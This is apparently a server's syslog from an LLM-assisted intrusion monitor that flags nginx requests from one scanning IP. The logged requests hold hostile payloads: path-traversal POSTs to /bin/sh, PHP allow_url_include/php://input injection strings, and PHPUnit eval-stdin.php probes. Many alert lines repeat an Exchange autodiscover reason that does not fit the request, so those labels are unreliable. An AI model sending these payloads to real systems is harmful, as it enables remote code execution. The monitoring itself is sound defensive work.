Mar 20 13:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:44:01.945566 [observer] Pipeline: processed=5735 pattern_hits=5476 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:44:01.945627 [observer] Patterns: hash=5476 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:44:31.944229 [observer] Pipeline: processed=5737 pattern_hits=5478 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:44:31.944254 [observer] Patterns: hash=5478 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:45:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:00.901697 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T13:45:00.901440304Z 101.36.107.228 - - [20/Mar/2026:13:45:00 +0000] "_" "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
Mar 20 13:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:01.823575 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T13:45:01.823281976Z 101.36.107.228 - - [20/Mar/2026:13:45:01 +0000] "_" "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%...
Mar 20 13:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:01.961035 [observer] Pipeline: processed=5743 pattern_hits=5484 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:01.961069 [observer] Patterns: hash=5484 prefix=0 regex=0 contains=0 deny=24 alert=434 suppress=0 misses=259
Mar 20 13:45:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:08.359617 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:45:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:08.359665 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an nginx error about a missing file and a request containing php://input and allow_url_include indicators, which are common in attempted PHP code injection/path traversal attacks. Line=2026-03-20T13:45:02.296712396Z 2026/03/20 13:45:02 [error] 422#422: *750652 open() "/usr/share/nginx/default/hello.world" failed (2: No such file or directory), client: 101.36.107.228, server: _, requ...
Mar 20 13:45:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:08.359801 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:02.296819336Z 101.36.107.228 - - [20/Mar/2026:13:45:02 +0000] "54.200.221.0" "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 2401 "-" ...
Mar 20 13:45:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:15.004970 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.75 action=deny pattern_type=
Mar 20 13:45:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:15.005018 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on a POST with a suspicious query attempting PHP wrappers suggests an injection/exploitation attempt targeted at PHP config. Likely malicious probe. Line=2026-03-20T13:45:02.938086815Z 101.36.107.228 - - [20/Mar/2026:13:45:02 +0000] "54.200.221.0" "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 405 150 "-" "libredtail-...
Mar 20 13:45:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:21.113082 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:45:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:21.113123 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a likely PHPUnit path under nginx suggests probing for vulnerable PHP code paths. The file does not exist, but the pattern is a known reconnaissance/attack vector. Line=2026-03-20T13:45:03.387650047Z 2026/03/20 13:45:03 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), ...
Mar 20 13:45:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:21.113192 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:03.387770991Z 101.36.107.228 - - [20/Mar/2026:13:45:03 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:45:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:25.922440 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:45:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:25.922481 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=External client attempting to access a suspicious PHP unit file path (vendor/phpunit/phpunit/Util/PHP/eval-stdin.php) on an nginx server. This mirrors common probing for phpunit vulnerabilities. Line=2026-03-20T13:45:04.070038785Z 2026/03/20 13:45:04 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), clie...
Mar 20 13:45:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:25.922536 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:04.070241504Z 101.36.107.228 - - [20/Mar/2026:13:45:04 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:31.940620 [observer] Pipeline: processed=5751 pattern_hits=5487 llm_calls=264 llm_errors=3 learned=4
Mar 20 13:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:31.940647 [observer] Patterns: hash=5487 prefix=0 regex=0 contains=0 deny=27 alert=434 suppress=0 misses=264
Mar 20 13:45:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:32.278323 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:45:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:32.278361 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to PHP Unit vendor path (eval-stdin.php) commonly used in exploit scans against phpunit; unusual path request indicating potential probe for RCE. Line=2026-03-20T13:45:04.654314901Z 2026/03/20 13:45:04 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: ...
Mar 20 13:45:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:32.278427 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:04.654503617Z 101.36.107.228 - - [20/Mar/2026:13:45:04 +0000] "54.200.221.0" "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:45:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:40.481228 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:45:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:40.481269 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request attempting to access a phpunit evaluation script (eval-stdin.php) which is a common probe for RCE/PII via PHP unit; file not found but indicative of exploitation attempt. Line=2026-03-20T13:45:05.255143537Z 2026/03/20 13:45:05 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101....
Mar 20 13:45:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:40.481334 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:05.255196260Z 101.36.107.228 - - [20/Mar/2026:13:45:05 +0000] "54.200.221.0" "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:45:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:44.450115 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:45:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:44.450152 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Accessing a phpunit license path under vendor suggests probing for phpunit in web root, a common web exploit pattern to locate vulnerable components. Line=2026-03-20T13:45:05.742950360Z 2026/03/20 13:45:05 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), clien...
Mar 20 13:45:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:44.450222 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:05.743087908Z 101.36.107.228 - - [20/Mar/2026:13:45:05 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:45:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:50.369607 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:45:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:50.369642 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit eval-stdin.php path which is a common probe for RCE/LFI or misconfiguration exposure Line=2026-03-20T13:45:06.539517606Z 2026/03/20 13:45:06 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direc...
Mar 20 13:45:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:50.369696 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:06.539684100Z 101.36.107.228 - - [20/Mar/2026:13:45:06 +0000] "54.200.221.0" "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "...
Mar 20 13:45:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:55.937395 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:45:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:55.937437 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path via HTTP request; commonly probed for known PHP unit vulnerabilities. Line=2026-03-20T13:45:07.230858238Z 2026/03/20 13:45:07 [error] 422#422: *750652 open() "/usr/share/nginx/default/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client:...
Mar 20 13:45:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:55.937549 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:07.230899189Z 101.36.107.228 - - [20/Mar/2026:13:45:07 +0000] "54.200.221.0" "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:46:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:00.758865 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.75 action=alert pattern_type=
Mar 20 13:46:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:00.758905 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to phpunit path suggests probing for vulnerable phpunit files; could be reconnaissance or attempted exploit Line=2026-03-20T13:45:07.783722944Z 2026/03/20 13:45:07 [error] 422#422: *750652 open() "/usr/share/nginx/default/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101...
Mar 20 13:46:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:00.758961 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:07.783844149Z 101.36.107.228 - - [20/Mar/2026:13:45:07 +0000] "54.200.221.0" "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:01.948645 [observer] Pipeline: processed=5763 pattern_hits=5493 llm_calls=270 llm_errors=3 learned=4
Mar 20 13:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:01.948680 [observer] Patterns: hash=5493 prefix=0 regex=0 contains=0 deny=33 alert=434 suppress=0 misses=270
Mar 20 13:46:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:07.942667 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.75 action=alert pattern_type=
Mar 20 13:46:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:07.942706 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit path that is often targeted in automated scanning; file not found but indicates probing for PHPUnit related vectors. Line=2026-03-20T13:45:08.289746866Z 2026/03/20 13:45:08 [error] 422#422: *750652 open() "/usr/share/nginx/default/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36....
Mar 20 13:46:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:07.942767 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:08.289855951Z 101.36.107.228 - - [20/Mar/2026:13:45:08 +0000] "54.200.221.0" "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:46:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:13.279014 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.80 action=deny pattern_type=
Mar 20 13:46:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:13.279068 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request targets a known phpunit tooling path via /phpunit/Util/PHP/eval-stdin.php, which is a common probe for phpunit-related RCE exploits. Line=2026-03-20T13:45:08.923029557Z 2026/03/20 13:45:08 [error] 422#422: *750652 open() "/usr/share/nginx/default/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107....
Mar 20 13:46:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:13.279122 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:08.923144637Z 101.36.107.228 - - [20/Mar/2026:13:45:08 +0000] "54.200.221.0" "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:46:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:18.057560 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:46:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:18.057602 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error shows an access attempt to a phpunit php file path which is a common probe for PHP code execution or vulnerability scanning. The request failed with file not found, but this pattern is unusual and warrants monitoring. Line=2026-03-20T13:45:09.493365314Z 2026/03/20 13:45:09 [error] 422#422: *750652 open() "/usr/share/nginx/default/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), cli...
Mar 20 13:46:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:18.057655 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:09.493520305Z 101.36.107.228 - - [20/Mar/2026:13:45:09 +0000] "54.200.221.0" "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:46:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:23.520604 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:46:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:23.520645 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path (eval-stdin.php) typical of probe or exploit attempts against PHP frameworks. Line=2026-03-20T13:45:10.015000419Z 2026/03/20 13:45:10 [error] 422#422: *750652 open() "/usr/share/nginx/default/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client:...
Mar 20 13:46:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:23.520711 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:10.015112147Z 101.36.107.228 - - [20/Mar/2026:13:45:10 +0000] "54.200.221.0" "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:46:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:28.575943 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:46:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:28.575982 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path commonly targeted in probes; shows potential attempt to locate vulnerable PHP tooling Line=2026-03-20T13:45:10.543516121Z 2026/03/20 13:45:10 [error] 422#422: *750652 open() "/usr/share/nginx/default/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101...
Mar 20 13:46:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:28.576049 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:10.543630738Z 101.36.107.228 - - [20/Mar/2026:13:45:10 +0000] "54.200.221.0" "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:31.937782 [observer] Pipeline: processed=5773 pattern_hits=5498 llm_calls=275 llm_errors=3 learned=4
Mar 20 13:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:31.937811 [observer] Patterns: hash=5498 prefix=0 regex=0 contains=0 deny=38 alert=434 suppress=0 misses=275
Mar 20 13:46:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:36.242778 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.78 action=deny pattern_type=
Mar 20 13:46:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:36.242815 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an explicit request to a PHPunit file path (eval-stdin.php) commonly targeted in exploitation attempts; indicates probing for vulnerable phpunit component. Line=2026-03-20T13:45:11.128886433Z 2026/03/20 13:45:11 [error] 422#422: *750652 open() "/usr/share/nginx/default/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36....
Mar 20 13:46:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:36.242868 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:11.129113277Z 101.36.107.228 - - [20/Mar/2026:13:45:11 +0000] "54.200.221.0" "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:46:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:42.033088 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:46:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:42.033129 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit path (eval-stdin.php) that typically should not exist on a public web root; could indicate probing for PHP unit framework or misconfiguration. Line=2026-03-20T13:45:11.776728127Z 2026/03/20 13:45:11 [error] 422#422: *750652 open() "/usr/share/nginx/default/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 13:46:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:42.033222 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:11.776728074Z 101.36.107.228 - - [20/Mar/2026:13:45:11 +0000] "54.200.221.0" "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:46:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:46.262412 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 13:46:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:46.262447 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error log showing an access attempt to a sensitive phpunit script path (eval-stdin.php) which is a common target for PHP unit framework exploits; not confirmed malicious but warrants monitoring. Line=2026-03-20T13:45:12.463911555Z 2026/03/20 13:45:12 [error] 422#422: *750652 open() "/usr/share/nginx/default/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or dire...
Mar 20 13:46:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:46.262499 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:12.464003337Z 101.36.107.228 - - [20/Mar/2026:13:45:12 +0000] "54.200.221.0" "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" ...
Mar 20 13:46:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:50.672415 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:46:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:50.672479 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit utility path under webroot is a common probe for PHP testing frameworks; indicates potential vulnerability probing or misconfiguration. Line=2026-03-20T13:45:13.128959567Z 2026/03/20 13:45:13 [error] 422#422: *750652 open() "/usr/share/nginx/default/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 13:46:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:50.672548 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:13.129106536Z 101.36.107.228 - - [20/Mar/2026:13:45:13 +0000] "54.200.221.0" "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 13:46:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:56.903322 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.75 action=alert pattern_type=
Mar 20 13:46:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:56.903359 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a PHPUnit file path is a common probe for phpunit-related vulnerabilities. Line=2026-03-20T13:45:13.690254490Z 2026/03/20 13:45:13 [error] 422#422: *750652 open() "/usr/share/nginx/default/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory...
Mar 20 13:46:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:56.903411 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:13.690348771Z 101.36.107.228 - - [20/Mar/2026:13:45:13 +0000] "54.200.221.0" "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
